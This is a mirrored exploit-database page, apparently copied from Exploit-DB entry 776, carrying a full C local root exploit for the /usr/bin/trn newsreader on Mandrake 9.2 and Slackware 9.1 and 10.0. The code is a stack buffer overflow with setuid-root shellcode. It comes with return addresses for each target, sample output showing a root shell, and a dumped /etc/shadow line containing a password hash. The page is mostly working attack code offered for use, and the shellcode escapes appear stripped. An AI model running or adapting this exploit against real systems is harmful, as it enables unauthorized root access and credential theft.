Mandrake / Slackware /usr/bin/trn – Local Privilege Escalation (Not SUID)

Mandrake / Slackware /usr/bin/trn – Local Privilege Escalation (Not SUID)

漏洞ID 1054873 漏洞类型
发布时间 2005-01-26 更新时间 2005-01-26
图片[1]-Mandrake / Slackware /usr/bin/trn – Local Privilege Escalation (Not SUID)-安全小百科CVE编号 N/A
图片[2]-Mandrake / Slackware /usr/bin/trn – Local Privilege Escalation (Not SUID)-安全小百科CNNVD-ID N/A
漏洞平台 Linux CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/776
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*
/usr/bin/trn local root exploit
By ZzagorR - http://www.rootbinbash.com
*/
/*
 sh-2.05b$ ./trn
  usage   : ./trn ret buf
  example : ./trn 0xbfffff64
  [+] mandrake   9.2  = 0xbfffff96
  [+] slackware 10.0.0= 0xbfffff98
  [+] slackware  9.1.0= 0xbfffff84
 sh-2.05b$
 sh-2.05b$ ./trn 0xbfffff84 128
  [BOO  %] 128
  [RET  %] bfffff84
 sh-2.05b#
 sh-2.05b# id
  uid=0(root) gid=98(nobody) groups=98(nobody)
 sh-2.05b# cat /etc/shadow
  root:$1$N88/N.aP$dBWcFHiYCXXNb77Y5LPNK1:12705:0:::::
TEST :
 MANDRAKE 9.2
 SLACKWARE 10.0.0
 SLACKWARE 9.1.0
 http://www.rootbinbash.com/d0kum4n/trn-test.txt
BOO:
 $trn `perl -e 'print "A" x 120'`
 $trn `perl -e 'print "A" x 124'`
 $trn `perl -e 'print "A" x 128'`
  Segmentation fault
BOO=128
*/

#include <stdio.h>
#include <string.h>
#define NEREDE "/usr/bin/trn"

char caylarbeles[] =
"x31xc0x31xdbxb0x17xcdx80"
"x31xc0x50x68x2fx2fx73x68"
"x68x2fx62x69x6ex89xe3x50"
"x53x89xe1x99xb0x0bxcdx80";

int main(int argc, char *argv[]){
 int bizim;
 char bufe[1000];
 char *tayfasi;
 if (argc < 3) {
  printf ("{           trn l0c4l r00t 3xpl01t          }n");
  printf ("{  By ZzagorR - http://www.rootbinbash.com  }n");
  printf ("{  usage   : %s ret buf                  }n",argv[0]);
  printf ("{  example : %s 0xbfffff99 142           }n",argv[0]);
  printf ("{  mandrake   9.2   = 0xbfffff96            }n");
  printf ("{  slackware 10.0.0 = 0xbfffff98            }n");
  printf ("{  slackware  9.1.0 = 0xbfffff84            }n");
  exit(1);
 }else{
  unsigned long RET=strtoul(argv[1], NULL, 16);
  int BOO = atoi(argv[2]);
   printf ("[BOO  %] %in",BOO);
   printf ("[RET  %] %xn",RET);
  tayfasi = bufe;
  memset(bufe, 0x41,256-strlen(caylarbeles));
  sprintf(bufe+256-strlen(caylarbeles), "%s", caylarbeles);
  for ( bizim = BOO; bizim <= BOO+4; bizim+= 4 )
   *(long*)(tayfasi+bizim) = RET;
  execl(NEREDE, NEREDE , bufe, NULL);
 }
}

// milw0rm.com [2005-01-26]

相关推荐: RedHat 9.0 / Slackware 8.1 – ‘/bin/mail’ Carbon Copy Field Buffer Overrun

RedHat 9.0 / Slackware 8.1 – ‘/bin/mail’ Carbon Copy Field Buffer Overrun 漏洞ID 1053913 漏洞类型 发布时间 2003-05-30 更新时间 2003-05-30 CVE编号 …

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享